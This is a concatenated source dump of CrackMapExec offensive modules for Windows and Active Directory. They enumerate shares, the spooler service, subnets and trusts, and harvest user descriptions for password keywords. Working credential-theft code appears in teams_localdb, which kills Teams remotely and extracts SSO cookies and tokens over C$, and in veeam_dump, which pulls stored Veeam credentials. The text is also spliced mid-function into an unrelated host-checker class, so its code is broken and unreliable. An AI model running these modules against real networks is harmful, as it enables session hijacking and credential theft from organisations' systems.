EXCLUDE_EXTS Case-insensitive extension filter to exclude (Default: ico,lnk)
EXCLUDE_FILTER Case-insensitive filter to exclude folders/files (Default: print$,ipc$)
MAX_FILE_SIZE Max file size to download (Default: 51200)
OUTPUT_FOLDER Path of the local folder to save files (Default: /tmp/cme_spider_plus)
"""
self.download_flag = False
if any("DOWNLOAD" in key for key in module_options.keys()):
self.download_flag = True
self.stats_flag = True
if any("STATS" in key for key in module_options.keys()):
self.stats_flag = False
self.exclude_exts = get_list_from_option(module_options.get("EXCLUDE_EXTS", "ico,lnk"))
self.exclude_exts = [d.lower() for d in self.exclude_exts] # force case-insensitive
self.exclude_filter = get_list_from_option(module_options.get("EXCLUDE_FILTER", "print$,ipc$"))
self.exclude_filter = [d.lower() for d in self.exclude_filter] # force case-insensitive
self.max_file_size = int(module_options.get("MAX_FILE_SIZE", 50 * 1024))
self.output_folder = module_options.get("OUTPUT_FOLDER", os.path.join("/tmp", "cme_spider_plus"))
def on_login(self, context, connection):
context.log.display("Started module spidering_plus with the following options:")
context.log.display(f" DOWNLOAD_FLAG: {self.download_flag}")
context.log.display(f" STATS_FLAG: {self.stats_flag}")
context.log.display(f"EXCLUDE_FILTER: {self.exclude_filter}")
context.log.display(f" EXCLUDE_EXTS: {self.exclude_exts}")
context.log.display(f" MAX_FILE_SIZE: {human_size(self.max_file_size)}")
context.log.display(f" OUTPUT_FOLDER: {self.output_folder}")
spider = SMBSpiderPlus(
connection,
context.log,
self.download_flag,
self.stats_flag,
self.exclude_exts,
self.exclude_filter,
self.max_file_size,
self.output_folder,
)
spider.spider_shares()
================================================
FILE: cme/modules/spooler.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py
from impacket import uuid
from impacket.dcerpc.v5 import transport, epm
from impacket.dcerpc.v5.rpch import (
RPC_PROXY_INVALID_RPC_PORT_ERR,
RPC_PROXY_CONN_A1_0X6BA_ERR,
RPC_PROXY_CONN_A1_404_ERR,
RPC_PROXY_RPC_OUT_DATA_404_ERR,
)
KNOWN_PROTOCOLS = {
135: {"bindstr": r"ncacn_ip_tcp:%s[135]"},
445: {"bindstr": r"ncacn_np:%s[\pipe\epmapper]"},
}
class CMEModule:
"""
For printnightmare: detect if print spooler is enabled or not. Then use @cube0x0's project https://github.com/cube0x0/CVE-2021-1675 or Mimikatz from Benjamin Delpy
Module by @mpgn_x64
"""
name = "spooler"
description = "Detect if print spooler is enabled or not"
supported_protocols = ["smb", "wmi"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
self.__string_binding = None
self.port = None
def options(self, context, module_options):
"""
PORT Port to check (defaults to 135)
"""
self.port = 135
if "PORT" in module_options:
self.port = int(module_options["PORT"])
def on_login(self, context, connection):
entries = []
lmhash = getattr(connection, "lmhash", "")
nthash = getattr(connection, "nthash", "")
self.__stringbinding = KNOWN_PROTOCOLS[self.port]["bindstr"] % connection.host
context.log.debug("StringBinding %s" % self.__stringbinding)
rpctransport = transport.DCERPCTransportFactory(self.__stringbinding)
rpctransport.set_credentials(connection.username, connection.password, connection.domain, lmhash, nthash)
rpctransport.setRemoteHost(connection.host if not connection.kerberos else connection.hostname + "." + connection.domain)
rpctransport.set_dport(self.port)
if connection.kerberos:
rpctransport.set_kerberos(connection.kerberos, connection.kdcHost)
try:
entries = self.__fetch_list(rpctransport)
except Exception as e:
error_text = "Protocol failed: %s" % e
context.log.critical(error_text)
if RPC_PROXY_INVALID_RPC_PORT_ERR in error_text or RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or RPC_PROXY_CONN_A1_404_ERR in error_text or RPC_PROXY_CONN_A1_0X6BA_ERR in error_text:
context.log.critical("This usually means the target does not allow " "to connect to its epmapper using RpcProxy.")
return
# Display results.
endpoints = {}
# Let's group the UUIDS
for entry in entries:
binding = epm.PrintStringBinding(entry["tower"]["Floors"])
tmp_uuid = str(entry["tower"]["Floors"][0])
if (tmp_uuid in endpoints) is not True:
endpoints[tmp_uuid] = {}
endpoints[tmp_uuid]["Bindings"] = list()
if uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18] in epm.KNOWN_UUIDS:
endpoints[tmp_uuid]["EXE"] = epm.KNOWN_UUIDS[uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18]]
else:
endpoints[tmp_uuid]["EXE"] = "N/A"
endpoints[tmp_uuid]["annotation"] = entry["annotation"][:-1].decode("utf-8")
endpoints[tmp_uuid]["Bindings"].append(binding)
if tmp_uuid[:36] in epm.KNOWN_PROTOCOLS:
endpoints[tmp_uuid]["Protocol"] = epm.KNOWN_PROTOCOLS[tmp_uuid[:36]]
else:
endpoints[tmp_uuid]["Protocol"] = "N/A"
for endpoint in list(endpoints.keys()):
if "MS-RPRN" in endpoints[endpoint]["Protocol"]:
context.log.debug("Protocol: %s " % endpoints[endpoint]["Protocol"])
context.log.debug("Provider: %s " % endpoints[endpoint]["EXE"])
context.log.debug("UUID : %s %s" % (endpoint, endpoints[endpoint]["annotation"]))
context.log.debug("Bindings: ")
for binding in endpoints[endpoint]["Bindings"]:
context.log.debug(" %s" % binding)
context.log.debug("")
context.log.highlight("Spooler service enabled")
try:
host = context.db.get_hosts(connection.host)[0]
context.db.add_host(
host.ip,
host.hostname,
host.domain,
host.os,
host.smbv1,
host.signing,
spooler=True,
)
except Exception as e:
context.log.debug(f"Error updating spooler status in database")
break
if entries:
num = len(entries)
if 1 == num:
context.log.debug(f"[Spooler] Received one endpoint")
else:
context.log.debug(f"[Spooler] Received {num} endpoints")
else:
context.log.debug(f"[Spooler] No endpoints found")
def __fetch_list(self, rpctransport):
dce = rpctransport.get_dce_rpc()
dce.connect()
resp = epm.hept_lookup(None, dce=dce)
dce.disconnect()
return resp
================================================
FILE: cme/modules/subnets.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from impacket.ldap import ldapasn1 as ldapasn1_impacket
def searchResEntry_to_dict(results):
data = {}
for attr in results["attributes"]:
key = str(attr["type"])
value = str(attr["vals"][0])
data[key] = value
return data
class CMEModule:
"""
Retrieves the different Sites and Subnets of an Active Directory
Authors:
Podalirius: @podalirius_
"""
def options(self, context, module_options):
"""
showservers Toggle printing of servers (default: true)
"""
self.showservers = True
self.base_dn = None
if module_options and "SHOWSERVERS" in module_options:
if module_options["SHOWSERVERS"].lower() == "true" or module_options["SHOWSERVERS"] == "1":
self.showservers = True
elif module_options["SHOWSERVERS"].lower() == "false" or module_options["SHOWSERVERS"] == "0":
self.showservers = False
else:
print("Could not parse showservers option.")
if module_options and "BASE_DN" in module_options:
self.base_dn = module_options["BASE_DN"]
name = "subnets"
description = "Retrieves the different Sites and Subnets of an Active Directory"
supported_protocols = ["ldap"]
opsec_safe = True
multiple_hosts = False
def on_login(self, context, connection):
dn = connection.ldapConnection._baseDN if self.base_dn is None else self.base_dn
context.log.display("Getting the Sites and Subnets from domain")
try:
list_sites = connection.ldapConnection.search(
searchBase="CN=Configuration,%s" % dn,
searchFilter="(objectClass=site)",
attributes=["distinguishedName", "name", "description"],
sizeLimit=999,
)
except LDAPSearchError as e:
context.log.fail(str(e))
exit()
for site in list_sites:
if isinstance(site, ldapasn1_impacket.SearchResultEntry) is not True:
continue
site = searchResEntry_to_dict(site)
site_dn = site["distinguishedName"]
site_name = site["name"]
site_description = ""
if "description" in site.keys():
site_description = site["description"]
# Getting subnets of this site
list_subnets = connection.ldapConnection.search(
searchBase="CN=Sites,CN=Configuration,%s" % dn,
searchFilter="(siteObject=%s)" % site_dn,
attributes=["distinguishedName", "name"],
sizeLimit=999,
)
if len([subnet for subnet in list_subnets if isinstance(subnet, ldapasn1_impacket.SearchResultEntry)]) == 0:
context.log.highlight('Site "%s"' % site_name)
else:
for subnet in list_subnets:
if isinstance(subnet, ldapasn1_impacket.SearchResultEntry) is not True:
continue
subnet = searchResEntry_to_dict(subnet)
subnet_dn = subnet["distinguishedName"]
subnet_name = subnet["name"]
if self.showservers:
# Getting machines in these subnets
list_servers = connection.ldapConnection.search(
searchBase=site_dn,
searchFilter="(objectClass=server)",
attributes=["cn"],
sizeLimit=999,
)
if len([server for server in list_servers if isinstance(server, ldapasn1_impacket.SearchResultEntry)]) == 0:
if len(site_description) != 0:
context.log.highlight('Site "%s" (Subnet:%s) (description:"%s")' % (site_name, subnet_name, site_description))
else:
context.log.highlight('Site "%s" (Subnet:%s)' % (site_name, subnet_name))
else:
for server in list_servers:
if isinstance(server, ldapasn1_impacket.SearchResultEntry) is not True:
continue
server = searchResEntry_to_dict(server)["cn"]
if len(site_description) != 0:
context.log.highlight(
'Site "%s" (Subnet:%s) (description:"%s") (Server:%s)'
% (
site_name,
subnet_name,
site_description,
server,
)
)
else:
context.log.highlight('Site "%s" (Subnet:%s) (Server:%s)' % (site_name, subnet_name, server))
else:
if len(site_description) != 0:
context.log.highlight('Site "%s" (Subnet:%s) (description:"%s")' % (site_name, subnet_name, site_description))
else:
context.log.highlight('Site "%s" (Subnet:%s)' % (site_name, subnet_name))
================================================
FILE: cme/modules/teams_localdb.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sqlite3
class CMEModule:
name = "teams_localdb"
description = "Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = False
def options(self, context, module_options):
""" """
def on_admin_login(self, context, connection):
context.log.display("Killing all Teams process to open the cookie file")
connection.execute("taskkill /F /T /IM teams.exe")
# sleep(3)
found = 0
paths = connection.spider("C$", folder="Users", regex=["[a-zA-Z0-9]*"], depth=0)
with open("/tmp/teams_cookies2.txt", "wb") as f:
for path in paths:
try:
connection.conn.getFile("C$", path + "/AppData/Roaming/Microsoft/Teams/Cookies", f.write)
context.log.highlight("Found Cookie file in path " + path)
found = 1
self.parse_file(context, "skypetoken_asm")
self.parse_file(context, "SSOAUTHCOOKIE")
f.seek(0)
f.trunkate()
except Exception as e:
if "STATUS_SHARING_VIOLATION" in str(e):
context.log.debug(str(e))
context.log.highlight("Found Cookie file in path " + path)
context.log.fail("Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database")
if found == 0:
context.log.display("No cookie file found in Users folder")
@staticmethod
def parse_file(context, name):
try:
conn = sqlite3.connect("/tmp/teams_cookies2.txt")
c = conn.cursor()
c.execute("SELECT value FROM cookies WHERE name = '" + name + "'")
row = c.fetchone()
if row is None:
context.log.fail("No " + name + " present in Microsoft Teams Cookies database")
else:
context.log.success("Succesfully extracted " + name + ": ")
context.log.success(row[0])
conn.close()
except Exception as e:
context.log.fail(str(e))
================================================
FILE: cme/modules/test_connection.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from sys import exit
class CMEModule:
"""
Executes the Test-Connection PowerShell cmdlet
Module by @byt3bl33d3r
"""
name = "test_connection"
description = "Pings a host"
supported_protocols = ["smb", "mssql"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
HOST Host to ping
"""
self.host = None
if "HOST" not in module_options:
context.log.fail("HOST option is required!")
exit(1)
self.host = module_options["HOST"]
def on_admin_login(self, context, connection):
# $ProgressPreference = 'SilentlyContinue' prevents the "preparing modules for the first time" error
command = f"$ProgressPreference = 'SilentlyContinue'; Test-Connection {self.host} -quiet -count 1"
output = connection.ps_execute(command, get_output=True)[0]
context.log.debug(f"Output: {output}")
context.log.debug(f"Type: {type(output)}")
if output == "True":
context.log.success("Pinged successfully")
else:
context.log.fail("Host unreachable")
================================================
FILE: cme/modules/trust.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class CMEModule:
'''
Extract all Trust Relationships, Trusting Direction, and Trust Transitivity
Module by Brandon Fisher @shad0wcntr0ller
'''
name = 'enum_trusts'
description = 'Extract all Trust Relationships, Trusting Direction, and Trust Transitivity'
supported_protocols = ['ldap']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
pass
def on_login(self, context, connection):
domain_dn = ','.join(['DC=' + dc for dc in connection.domain.split('.')])
search_filter = '(&(objectClass=trustedDomain))'
attributes = ['flatName', 'trustPartner', 'trustDirection', 'trustAttributes']
context.log.debug(f'Search Filter={search_filter}')
resp = connection.ldapConnection.search(searchBase=domain_dn, searchFilter=search_filter, attributes=attributes, sizeLimit=0)
trusts = []
context.log.debug(f'Total of records returned {len(resp)}')
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
flat_name = ''
trust_partner = ''
trust_direction = ''
trust_transitive = []
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'flatName':
flat_name = str(attribute['vals'][0])
elif str(attribute['type']) == 'trustPartner':
trust_partner = str(attribute['vals'][0])
elif str(attribute['type']) == 'trustDirection':
if str(attribute['vals'][0]) == '1':
trust_direction = 'Inbound'
elif str(attribute['vals'][0]) == '2':
trust_direction = 'Outbound'
elif str(attribute['vals'][0]) == '3':
trust_direction = 'Bidirectional'
elif str(attribute['type']) == 'trustAttributes':
trust_attributes_value = int(attribute['vals'][0])
if trust_attributes_value & 0x1:
trust_transitive.append('Non-Transitive')
if trust_attributes_value & 0x2:
trust_transitive.append('Uplevel-Only')
if trust_attributes_value & 0x4:
trust_transitive.append('Quarantined Domain')
if trust_attributes_value & 0x8:
trust_transitive.append('Forest Transitive')
if trust_attributes_value & 0x10:
trust_transitive.append('Cross Organization')
if trust_attributes_value & 0x20:
trust_transitive.append('Within Forest')
if trust_attributes_value & 0x40:
trust_transitive.append('Treat as External')
if trust_attributes_value & 0x80:
trust_transitive.append('Uses RC4 Encryption')
if trust_attributes_value & 0x100:
trust_transitive.append('Cross Organization No TGT Delegation')
if trust_attributes_value & 0x2000:
trust_transitive.append('PAM Trust')
if not trust_transitive:
trust_transitive.append('Other')
trust_transitive = ', '.join(trust_transitive)
if flat_name and trust_partner and trust_direction and trust_transitive:
trusts.append((flat_name, trust_partner, trust_direction, trust_transitive))
except Exception as e:
context.log.debug(f'Cannot process trust relationship due to error {e}')
pass
if trusts:
context.log.success('Found the following trust relationships:')
for trust in trusts:
context.log.highlight(f'{trust[1]} -> {trust[2]} -> {trust[3]}')
else:
context.log.display('No trust relationships found')
return True
================================================
FILE: cme/modules/uac.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
class CMEModule:
name = "uac"
description = "Checks UAC status"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
logging.debug("test")
def options(self, context, module_options):
""" """
def on_admin_login(self, context, connection):
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(
remoteOps._RemoteOperations__rrp,
regHandle,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
)
keyHandle = ans["phkResult"]
dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "EnableLUA")
if uac_value == 1:
context.log.highlight("UAC Status: 1 (UAC Enabled)")
elif uac_value == 0:
context.log.highlight("UAC Status: 0 (UAC Disabled)")
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
remoteOps.finish()
================================================
FILE: cme/modules/user_desc.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pathlib import Path
from datetime import datetime
from impacket.ldap import ldap, ldapasn1
from impacket.ldap.ldap import LDAPSearchError
class CMEModule:
"""
Get user descriptions stored in Active Directory.
Module by Tobias Neitzel (@qtc_de)
"""
name = "user-desc"
description = "Get user descriptions stored in Active Directory"
supported_protocols = ["ldap"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, multiple_options=None):
self.keywords = None
self.search_filter = None
self.account_names = None
self.context = None
self.desc_count = None
self.log_file = None
def options(self, context, module_options):
"""
LDAP_FILTER Custom LDAP search filter (fully replaces the default search)
DESC_FILTER An additional seach filter for descriptions (supports wildcard *)
DESC_INVERT An additional seach filter for descriptions (shows non matching)
USER_FILTER An additional seach filter for usernames (supports wildcard *)
USER_INVERT An additional seach filter for usernames (shows non matching)
KEYWORDS Use a custom set of keywords (comma separated)
ADD_KEYWORDS Add additional keywords to the default set (comma separated)
"""
self.log_file = None
self.desc_count = 0
self.context = context
self.account_names = set()
self.keywords = {"pass", "creds", "creden", "key", "secret", "default"}
if "LDAP_FILTER" in module_options:
self.search_filter = module_options["LDAP_FILTER"]
else:
self.search_filter = "(&(objectclass=user)"
if "DESC_FILTER" in module_options:
self.search_filter += f"(description={module_options['DESC_FILTER']})"
if "DESC_INVERT" in module_options:
self.search_filter += f"(!(description={module_options['DESC_INVERT']}))"
if "USER_FILTER" in module_options:
self.search_filter += f"(sAMAccountName={module_options['USER_FILTER']})"
if "USER_INVERT" in module_options:
self.search_filter += f"(!(sAMAccountName={module_options['USER_INVERT']}))"
self.search_filter += ")"
if "KEYWORDS" in module_options:
self.keywords = set(module_options["KEYWORDS"].split(","))
elif "ADD_KEYWORDS" in module_options:
add_keywords = set(module_options["ADD_KEYWORDS"].split(","))
self.keywords = self.keywords.union(add_keywords)
def on_login(self, context, connection):
"""
On successful LDAP login we perform a search for all user objects that have a description.
Users can specify additional LDAP filters that are applied to the query.
"""
self.create_log_file(connection.conn.getRemoteHost(), datetime.now().strftime("%Y%m%d_%H%M%S"))
context.log.info(f"Starting LDAP search with search filter '{self.search_filter}'")
try:
sc = ldap.SimplePagedResultsControl()
connection.ldapConnection.search(
searchFilter=self.search_filter,
attributes=["sAMAccountName", "description"],
sizeLimit=0,
searchControls=[sc],
perRecordCallback=self.process_record,
)
except LDAPSearchError as e:
context.log.fail(f"Obtained unexpected exception: {str(e)}")
finally:
self.delete_log_file()
def create_log_file(self, host, time):
"""
Create a log file for dumping user descriptions.
"""
logfile = f"UserDesc-{host}-{time}.log"
logfile = Path.home().joinpath(".cme").joinpath("logs").joinpath(logfile)
self.context.log.info(f"Creating log file '{logfile}'")
self.log_file = open(logfile, "w")
self.append_to_log("User:", "Description:")
def delete_log_file(self):
"""
Closes the log file.
"""
try:
self.log_file.close()
info = f"Saved {self.desc_count} user descriptions to {self.log_file.name}"
self.context.log.highlight(info)
except AttributeError:
pass
def append_to_log(self, user, description):
"""
Append a new entry to the log file. Helper function that is only used to have an
unified padding on the user field.
"""
print(user.ljust(25), description, file=self.log_file)
def process_record(self, item):
"""
Function that is called to process the items obtained by the LDAP search. All items are
written to the log file per default. Items that contain one of the keywords configured
within this module are also printed to stdout.
On large Active Directories there seems to be a problem with duplicate user entries. For
some reason the process_record function is called multiple times with the same user entry.
Not sure whether this is a fault by this module or by impacket. As a workaround, this
function adds each new account name to a set and skips accounts that have already been added.
"""
if not isinstance(item, ldapasn1.SearchResultEntry):
return
sAMAccountName = ""
description = ""
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "sAMAccountName":
sAMAccountName = attribute["vals"][0].asOctets().decode("utf-8")
elif str(attribute["type"]) == "description":
description = attribute["vals"][0].asOctets().decode("utf-8")
except Exception as e:
entry = sAMAccountName or "item"
self.context.error(f"Skipping {entry}, cannot process LDAP entry due to error: '{str(e)}'")
if description and sAMAccountName not in self.account_names:
self.desc_count += 1
self.append_to_log(sAMAccountName, description)
if self.highlight(description):
self.context.log.highlight(f"User: {sAMAccountName} - Description: {description}")
self.account_names.add(sAMAccountName)
def highlight(self, description):
"""
Check for interesting entries. Just checks whether certain keywords are contained within the
user description. Keywords are configured at the top of this class within the options function.
It is tempting to implement more logic here (e.g. catch all strings that are longer than seven
characters and contain 3 different character classes). Such functionality is nice when playing
CTF in small AD environments. When facing a real AD, such functionality gets annoying, because
it generates too much output with 99% of it being false positives.
The recommended way when targeting user descriptions is to use the keyword filter to catch low-hanging fruit.
More dedicated searches for sensitive information should be done using the logfile.
This allows you to refine your search query at any time without having to pull data from AD again.
"""
for keyword in self.keywords:
if keyword.lower() in description.lower():
return True
return False
================================================
FILE: cme/modules/veeam_dump.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Initially created by @sadshade, all output to him:
# https://github.com/sadshade/veeam-output
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
import traceback
from base64 import b64encode
from cme.helpers.powershell import get_ps_script
class CMEModule:
"""
Module by @NeffIsBack, @Marshall-Hallenbeck
"""
name = "veeam"
description = "Extracts credentials from local Veeam SQL Database"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def __init__(self):
with open(get_ps_script("veeam_dump_module/veeam_dump_mssql.ps1"), "r") as psFile:
self.psScriptMssql = psFile.read()
with open(get_ps_script("veeam_dump_module/veeam_dump_postgresql.ps1"), "r") as psFile:
self.psScriptPostgresql = psFile.read()
def options(self, context, module_options):
"""
No options
"""
pass
def checkVeeamInstalled(self, context, connection):
context.log.display("Looking for Veeam installation...")
# MsSql
SqlDatabase = ""
SqlInstance = ""
SqlServer = ""
# PostgreSql
PostgreSqlExec = ""
PostgresUserForWindowsAuth = ""
SqlDatabaseName = ""
try:
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans["phKey"]
# Veeam v12 check
try:
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, "SOFTWARE\\Veeam\\Veeam Backup and Replication\\DatabaseConfigurations",)
keyHandle = ans["phkResult"]
database_config = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlActiveConfiguration")[1].split("\x00")[:-1][0]
context.log.success("Veeam v12 installation found!")
if database_config == "PostgreSql":
# Find the PostgreSql installation path containing "psql.exe"
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, "SOFTWARE\\PostgreSQL Global Development Group\\PostgreSQL",)
keyHandle = ans["phkResult"]
PostgreSqlExec = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "Location")[1].split("\x00")[:-1][0] + "\\bin\\psql.exe"
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, "SOFTWARE\\Veeam\\Veeam Backup and Replication\\DatabaseConfigurations\\PostgreSQL",)
keyHandle = ans["phkResult"]
PostgresUserForWindowsAuth = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "PostgresUserForWindowsAuth")[1].split("\x00")[:-1][0]
SqlDatabaseName = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlDatabaseName")[1].split("\x00")[:-1][0]
elif database_config == "MsSql":
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, "SOFTWARE\\Veeam\\Veeam Backup and Replication\\DatabaseConfigurations\\MsSql",)
keyHandle = ans["phkResult"]
SqlDatabase = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlDatabaseName")[1].split("\x00")[:-1][0]
SqlInstance = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlInstanceName")[1].split("\x00")[:-1][0]
SqlServer = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlServerName")[1].split("\x00")[:-1][0]
except DCERPCException as e:
if str(e).find("ERROR_FILE_NOT_FOUND"):
context.log.debug("No Veeam v12 installation found")
except Exception as e:
context.log.fail(f"UNEXPECTED ERROR: {e}")
context.log.debug(traceback.format_exc())
# Veeam v11 check
try:
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, "SOFTWARE\\Veeam\\Veeam Backup and Replication",)
keyHandle = ans["phkResult"]
SqlDatabase = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlDatabaseName")[1].split("\x00")[:-1][0]
SqlInstance = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlInstanceName")[1].split("\x00")[:-1][0]
SqlServer = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "SqlServerName")[1].split("\x00")[:-1][0]
context.log.success("Veeam v11 installation found!")
except DCERPCException as e:
if str(e).find("ERROR_FILE_NOT_FOUND"):
context.log.debug("No Veeam v11 installation found")
except Exception as e:
context.log.fail(f"UNEXPECTED ERROR: {e}")
context.log.debug(traceback.format_exc())
except NotImplementedError as e:
pass
except Exception as e:
context.log.fail(f"UNEXPECTED ERROR: {e}")
context.log.debug(traceback.format_exc())
finally:
try:
remoteOps.finish()
except Exception as e:
context.log.debug(f"Error shutting down remote registry service: {e}")
# Check if we found an SQL Server of some kind
if SqlDatabase and SqlInstance and SqlServer:
context.log.success(f'Found Veeam DB "{SqlDatabase}" on SQL Server "{SqlServer}\\{SqlInstance}"! Extracting stored credentials...')
credentials = self.executePsMssql(context, connection, SqlDatabase, SqlInstance, SqlServer)
self.printCreds(context, credentials)
elif PostgreSqlExec and PostgresUserForWindowsAuth and SqlDatabaseName:
context.log.success(f'Found Veeam DB "{SqlDatabaseName}" on an PostgreSQL Instance! Extracting stored credentials...')
credentials = self.executePsPostgreSql(context, connection, PostgreSqlExec, PostgresUserForWindowsAuth, SqlDatabaseName)
self.printCreds(context, credentials)
def stripXmlOutput(self, context, output):
return output.split("CLIXML")[1].split(" {OUTDATED_THRESHOLD} days ago']
def check_administrator_name(self):
user_info = self.get_user_info(self.connection, rid=500)
name = user_info['UserName']
ok = name not in ('Administrator', 'Administrateur')
reasons = [f'Administrator name changed to {name}' if ok else 'Administrator name unchanged']
return ok, reasons
def check_guest_account_disabled(self):
user_info = self.get_user_info(self.connection, rid=501)
uac = user_info['UserAccountControl']
disabled = bool(uac & samr.USER_ACCOUNT_DISABLED)
reasons = ['Guest account disabled' if disabled else 'Guest account enabled']
return disabled, reasons
def check_spooler_service(self):
ok = False
service_config, service_status = self.get_service('Spooler', self.connection)
if service_config['dwStartType'] == scmr.SERVICE_DISABLED:
ok = True
reasons = ['Spooler service disabled']
else:
reasons = ['Spooler service enabled']
if service_status == scmr.SERVICE_RUNNING:
reasons.append('Spooler service running')
elif service_status == scmr.SERVICE_STOPPED:
ok = True
reasons.append('Spooler service not running')
return ok, reasons
def check_wsus_running(self):
ok = True
reasons = []
service_config, service_status = self.get_service('wuauserv', self.connection)
if service_config['dwStartType'] == scmr.SERVICE_DISABLED:
reasons = ['WSUS service disabled']
elif service_status != scmr.SERVICE_RUNNING:
reasons = ['WSUS service not running']
return ok, reasons
def check_nbtns(self):
key_name = 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NetBT\\Parameters\\Interfaces'
subkeys = self.reg_get_subkeys(self.dce, self.connection, key_name)
success = False
reasons = []
missing = 0
nbtns_enabled = 0
for subkey in subkeys:
value = self.reg_query_value(self.dce, self.connection, key_name + '\\' + subkey, 'NetbiosOptions')
if type(value) == DCERPCSessionError:
if value.error_code == ERROR_OBJECT_NOT_FOUND:
missing += 1
continue
if value != 2:
nbtns_enabled += 1
if missing > 0:
reasons.append(f'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NetBT\\Parameters\\Interfaces\\\\NetbiosOption: value not found on {missing} interfaces')
if nbtns_enabled > 0:
reasons.append(f'NBTNS enabled on {nbtns_enabled} interfaces out of {len(subkeys)}')
if missing == 0 and nbtns_enabled == 0:
success = True
reasons.append('NBTNS disabled on all interfaces')
return success, reasons
def check_applocker(self):
key_name = 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\SrpV2'
subkeys = self.reg_get_subkeys(self.dce, self.connection, key_name)
rule_count = 0
for collection in subkeys:
collection_key_name = key_name + '\\' + collection
rules = self.reg_get_subkeys(self.dce, self.connection, collection_key_name)
rule_count += len(rules)
success = rule_count > 0
reasons = [f'Found {rule_count} AppLocker rules defined']
return success, reasons
# Methods for getting values from the remote registry #
#######################################################
def _open_root_key(self, dce, connection, root_key):
ans = None
retries = 1
opener = {
'HKLM':rrp.hOpenLocalMachine,
'HKCR':rrp.hOpenClassesRoot,
'HKU':rrp.hOpenUsers,
'HKCU':rrp.hOpenCurrentUser,
'HKCC':rrp.hOpenCurrentConfig
}
while retries > 0:
try:
ans = opener[root_key.upper()](dce)
break
except KeyError:
self.context.log.error(f'HostChecker._open_root_key():{connection.host}: Invalid root key. Must be one of HKCR, HKCC, HKCU, HKLM or HKU')
break
except Exception as e:
self.context.log.error(f'HostChecker._open_root_key():{connection.host}: Error while trying to open {root_key.upper()}: {e}')
if 'Broken pipe' in e.args:
self.context.log.error('Retrying')
retries -= 1
return ans
def reg_get_subkeys(self, dce, connection, key_name):
root_key, subkey = key_name.split('\\', 1)
ans = self._open_root_key(dce, connection, root_key)
subkeys = []
if ans is None:
return subkeys
root_key_handle = ans['phKey']
try:
ans = rrp.hBaseRegOpenKey(dce, root_key_handle, subkey)
except DCERPCSessionError as e:
if e.error_code != ERROR_FILE_NOT_FOUND:
self.context.log.error(f'HostChecker.reg_get_subkeys(): Could not retrieve subkey {subkey}: {e}\n')
return subkeys
except Exception as e:
self.context.log.error(f'HostChecker.reg_get_subkeys(): Error while trying to retrieve subkey {subkey}: {e}\n')
return subkeys
subkey_handle = ans['phkResult']
i = 0
while True:
try:
ans = rrp.hBaseRegEnumKey(dce=dce, hKey=subkey_handle, dwIndex=i)
subkeys.append(ans['lpNameOut'][:-1])
i += 1
except DCERPCSessionError as e:
break
return subkeys
